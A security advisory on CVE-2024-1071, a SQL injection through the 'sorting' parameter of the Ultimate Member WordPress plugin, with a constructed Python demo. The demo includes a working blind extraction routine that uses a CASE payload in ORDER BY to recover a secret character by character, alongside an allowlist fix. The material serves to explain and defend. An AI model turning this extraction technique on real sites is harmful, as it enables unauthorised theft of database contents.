Critical SQL injection vulnerability in 'Ultimate Member' WordPress Plugin
Take action: If you are using Ultimate Member for WordPress, update to the latest version (2.8.3 or later) as soon as you can. At minimum, make sure that the option "Enable custom table for usermeta" in the plugin settings is deactivated, since the vulnerability is only exploitable while that option is enabled.
Learn More
A critical SQL injection vulnerability has been reported in the Ultimate Member plugin for WordPress.
The vulnerability, tracked as CVE-2024-1071 (CVSS score 9.8), affects over 200,000 installations. It allows unauthenticated attackers to inject SQL into database queries through an insecure implementation in the plugin's user query functionality, specifically via the 'sorting' parameter. The flaw arises from inadequate sanitization of user-supplied parameters and insufficient query preparation. Note that a sort column or expression cannot be bound through a prepared-statement placeholder the way a value can, so a user-controlled sort parameter has to be validated against a fixed list of permitted sort keys before it reaches the query. Without that check, attackers can manipulate the query and extract sensitive information from the database.
The vulnerability is only exploitable when the plugin's "Enable custom table for usermeta" option is active. Despite this limitation, users of the plugin are strongly advised to update to version 2.8.3, which contains the patch. The patch was released on February 19th, 2024, following the report of the vulnerability on January 30th, 2024.
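To illustrate the bug class this advisory describes, the following is an added example; it is not Ultimate Member's code and does not reproduce the plugin's actual query internals. It shows a user-supplied sort parameter concatenated into an ORDER BY clause, the blind data extraction that such a sink permits even without any row content being echoed back, and the allowlist check that closes it. The table name, column names, sample rows and secret values are all constructed for the illustration; it assumes Python 3 with the standard sqlite3 module.

```python
import sqlite3

# Constructed sample data (hypothetical; not from the plugin or the advisory).
# Logins are deliberately out of id order so "ORDER BY id" and
# "ORDER BY -id" produce visibly different result orders.
ROWS = [
    (1, "carol", "s3cret"),
    (2, "alice", "hunter2"),
    (3, "bob", "letmein"),
]

# Allowlist of permitted sort keys mapped to the actual column to sort on.
# Identifiers cannot be bound as query parameters, so this lookup is the fix.
ALLOWED_SORT = {
    "id": "id",
    "user_login": "user_login",
}


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (id INTEGER PRIMARY KEY, user_login TEXT, secret TEXT)"
    )
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_query(conn, sorting):
    """Bug class under discussion: the untrusted 'sorting' value is pasted
    straight into ORDER BY. Only id and login are returned to the caller."""
    sql = "SELECT id, user_login FROM members ORDER BY " + sorting
    return [row[1] for row in conn.execute(sql)]


def hardened_query(conn, sorting):
    """Fixed form: the sort key is looked up in an allowlist; anything else is
    rejected before it can reach the SQL string."""
    column = ALLOWED_SORT.get(sorting)
    if column is None:
        raise ValueError("unsupported sort key: %r" % sorting)
    sql = "SELECT id, user_login FROM members ORDER BY " + column
    return [row[1] for row in conn.execute(sql)]


def extract_secret(conn, target_id, max_len=16):
    """Blind extraction through the vulnerable sort parameter: a CASE
    expression flips the sort direction depending on one character of the
    target row's secret, and the attacker reads the answer from the order of
    the returned logins. Nothing from the secret column is ever output."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    ascending = vulnerable_query(conn, "id")  # order seen when the guess is right
    secret = ""
    for pos in range(1, max_len + 1):
        found = None
        for ch in alphabet:
            payload = (
                "CASE WHEN (SELECT substr(secret,%d,1) FROM members WHERE id=%d) = '%s' "
                "THEN id ELSE -id END" % (pos, target_id, ch)
            )
            if vulnerable_query(conn, payload) == ascending:
                found = ch
                break
        if found is None:
            break  # substr() past the end returns '', which matches no guess
        secret += found
    return secret


def sort_key_rejected(conn, sorting):
    """True if the hardened query refuses the given sort value."""
    try:
        hardened_query(conn, sorting)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, sorted by id:", vulnerable_query(db, "id"))
    print("secret of id 1 recovered via sort order:", extract_secret(db, 1))
    print("hardened query rejects payload:",
          sort_key_rejected(db, "CASE WHEN 1=1 THEN id ELSE -id END"))
```

The payload never needs an error message or a UNION: the attacker only compares result ordering, which is why an ORDER BY sink is exploitable even when the endpoint returns nothing but a list of public usernames. The hardened version does not try to escape or quote the sort value; it maps a small set of accepted keys to columns and refuses everything else, which is the only robust way to handle identifiers that a prepared statement cannot parameterize.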